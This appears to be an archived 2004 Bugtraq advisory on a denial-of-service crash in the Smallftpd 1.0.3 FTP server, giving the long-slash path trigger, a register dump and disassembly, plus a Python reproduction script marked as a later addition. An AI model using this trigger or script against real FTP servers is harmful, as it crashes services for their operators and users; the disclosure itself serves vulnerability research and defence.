Open Source and information security mailing list archives
Date: Wed, 18 Feb 2004 06:41:19 +0800
From: "intuit e.b." <intuit@...uxmail.org>
To: bugtraq@...urityfocus.com
Subject: Smallftpd 1.0.3 DoS


Application:  Smallftpd 
              http://smallftpd.free.fr/

Version:      1.0.3

Bug:          Denial Of Service

Author:       intuit
              e-mail: intuit@...uxmail.org
              web: http://rootshells.tk/
              greetz to: tgs ;)))


***********************************************************************

1. Description
2. The bug
3. The code
4. The fix

***********************************************************************

^^^^^^^^^^^^^^^^
1. Description:
^^^^^^^^^^^^^^^^

Vendor's Description:

"Small ftpd is a small and simple multi-threaded ftp server for windows."


***********************************************************************

^^^^^^^^^^^^^^^^
2. The bug:
^^^^^^^^^^^^^^^^

Sending a request string like the following (usually two times suffice):
-----------------------------------------------------------------------

ftp://user:pass@....0.0.1/[464 and more "/" symbols]/../../../

-----------------------------------------------------------------------

crashes smallftpd.exe.
The user:pass credentials must be valid, so the bug is only reachable
after a successful login.
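To make the trigger above reproducible against a lab copy of the server, the following reproduction script is added here; it is not part of the original post and not Smallftpd's own code. It assumes that an FTP client turns the ftp:// URL into a CWD of the path (the advisory does not say which command the client issued), that the host, port and user:pass placeholders are replaced with a real, valid login, and it also decodes the EAX value from the crash report in section 3, which is the ASCII bytes of "PASV".

```python
"""Reproduction helper for the Smallftpd 1.0.3 denial of service.

Added example, not code from the original advisory or the Smallftpd
project.  Assumptions not stated in the advisory:
  * the ftp:// URL was delivered by the client as a CWD of the path;
  * HOST, PORT, USER and PASSWORD are placeholders for a lab server.
"""
import ftplib

SLASH_COUNT = 464                 # advisory: "464 and more '/' symbols"
ATTEMPTS = 2                      # advisory: "usually two times suffice"
HOST, PORT = "127.0.0.1", 21      # placeholders (assumption)
USER, PASSWORD = "user", "pass"   # must be a valid login: bug needs auth


def build_path(slashes=SLASH_COUNT, suffix="/../../../"):
    """Path part of ftp://user:pass@host/[464+ '/']/../../../ ."""
    return "/" * slashes + suffix


def dword_as_ascii(value):
    """Show a 32-bit register value as the little-endian bytes it holds.

    The faulting pointer EAX=0x56534150 from the crash report decodes to
    the FTP verb 'PASV', i.e. request text rather than a valid address."""
    return value.to_bytes(4, "little").decode("ascii", errors="replace")


def send_trigger(host=HOST, port=PORT, user=USER, password=PASSWORD,
                 timeout=5):
    """Log in and send the long path ATTEMPTS times.

    Returns 'crashed' when the server drops the connection during a
    request or refuses a later connection, 'unreachable' if the very
    first connection fails, otherwise the last server reply."""
    last = ""
    path = build_path()
    for attempt in range(1, ATTEMPTS + 1):
        ftp = ftplib.FTP()
        try:
            ftp.connect(host, port, timeout=timeout)
        except OSError:
            # Refused after an earlier attempt: the process is gone.
            return "crashed" if attempt > 1 else "unreachable"
        try:
            ftp.login(user, password)
            try:
                last = ftp.cwd(path)          # sends "CWD " + path
            except ftplib.Error as e:
                last = str(e)                 # a 4xx/5xx reply: still alive
            ftp.quit()
        except (EOFError, OSError):
            return "crashed"                  # connection died mid-request
    return last


if __name__ == "__main__":
    print("EAX 0x56534150 as bytes:", dword_as_ascii(0x56534150))
    print("server:", send_trigger())
```

Only run this against a host you own; the script deliberately sends the CWD once per connection so that a refused second connection is a clean signal that the first request killed the process.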


***********************************************************************

^^^^^^^^^^^^^^^^
3. The code:
^^^^^^^^^^^^^^^^

The crash occurs here (Windows error report and register dump):

-----------------------------------------------------------------------
AppName: smallftpd.exe	 AppVer: 0.0.0.0	 ModName: user32.dll
ModVer: 5.1.2600.0	 Offset: 0000ca84
-----------------------------------------------------------------------

-----------------------------------------------------------------------
Registers:
  
 EAX=56534150 EBX=0000000A ECX=56534150 EDX=00000000 
 ESI=56534151 EDI=0136F8FA EIP=77D4CA84 ESP=0136F85C 
 EBP=0136F894 EFL=00000206 
 CS=001B DS=0023 ES=0023 SS=0023 
 FS = 0038 GS = 0000 OV=0 UP=0 EI=1 PL=0 ZR=0 AC=0 PE=1 CY=0

 56534150 = ?? (read as little-endian bytes 50 41 53 56 this is the ASCII
 string "PASV"; EAX, ECX and ESI all hold it, which suggests the string
 pointer has been overwritten with request text rather than merely
 pointing at an accidental bad address)

Code (user32.dll, Win XP Build 2600, Service Pack: None):

77D4C9F6   mov         ecx,dword ptr [esp+8]
77D4C9FA   mov         eax,dword ptr [esp+4]
77D4C9FE   cmp         ecx,eax
77D4CA00   jbe         77D4CA12
77D4CA02   push        ebx
77D4CA03   mov         bl,byte ptr [ecx]
77D4CA05   mov         dl,byte ptr [eax]
77D4CA07   mov         byte ptr [eax],bl
77D4CA09   inc         eax
77D4CA0A   mov         byte ptr [ecx],dl
77D4CA0C   dec         ecx
77D4CA0D   cmp         ecx,eax
77D4CA0F   ja          77D4CA03
77D4CA11   pop         ebx
77D4CA12   ret         8
77D4CA15   sub         ecx,69h
77D4CA18   je          77D4C85C
77D4CA1E   sub         ecx,7
77D4CA21   je          77D77FAF
77D4CA27   sub         ecx,3
77D4CA2A   je          77D4CAF5
77D4CA30   dec         ecx
77D4CA31   dec         ecx
77D4CA32   je          77D4C863
77D4CA38   sub         ecx,3
77D4CA3B   jne         77D4C97D
77D4CA41   cmp         byte ptr [ebp+0Bh],0
77D4CA45   push        10h
77D4CA47   pop         ebx
77D4CA48   je          77D4C867
77D4CA4E   cmp         dword ptr [ebp-20h],0
77D4CA52   sete        al
77D4CA55   dec         al
77D4CA57   and         al,0E0h
77D4CA59   add         al,78h
77D4CA5B   mov         byte ptr [ebp+0Bh],al
77D4CA5E   jmp         77D4C867
77D4CA63   cmp         dword ptr [ebp-14h],eax
77D4CA66   jne         77D7ED06
77D4CA6C   mov         ecx,dword ptr [ebp-0Ch]
77D4CA6F   mov         ecx,dword ptr [ecx-4]
77D4CA72   mov         dword ptr [ebp-2Ch],ecx
77D4CA75   mov         dword ptr [ebp-28h],eax
77D4CA78   jmp         77D4C89D
77D4CA7D   add         ecx,esi
77D4CA7F   jmp         77D4C9D5
77D4CA84   mov         dl,byte ptr [eax]        <<< ftp server crashing here (read fault: EAX=56534150 is not mapped)
77D4CA86   inc         eax
77D4CA87   test        dl,dl
77D4CA89   jne         77D4CA84                 <<< strlen-style scan of the string at EAX until a NUL byte
77D4CA8B   sub         eax,esi
77D4CA8D   xor         esi,esi
77D4CA8F   xor         edx,edx
77D4CA91   cmp         dword ptr [ebp-10h],edx
77D4CA94   jge         77D7A796
77D4CA9A   sub         dword ptr [ebp-8],eax
77D4CA9D   cmp         esi,edx
77D4CA9F   jne         77D6FF80


-----------------------------------------------------------------------

/*Tested on: Win XP Build 2600, Service Pack: None
             Win XP Build 2600, Service Pack: SP1  
             Win 98 Second Edition                 */
***********************************************************************

^^^^^^^^^^^^^^^^
4. The fix:
^^^^^^^^^^^^^^^^

No vendor fix exists at the time of writing.

***********************************************************************
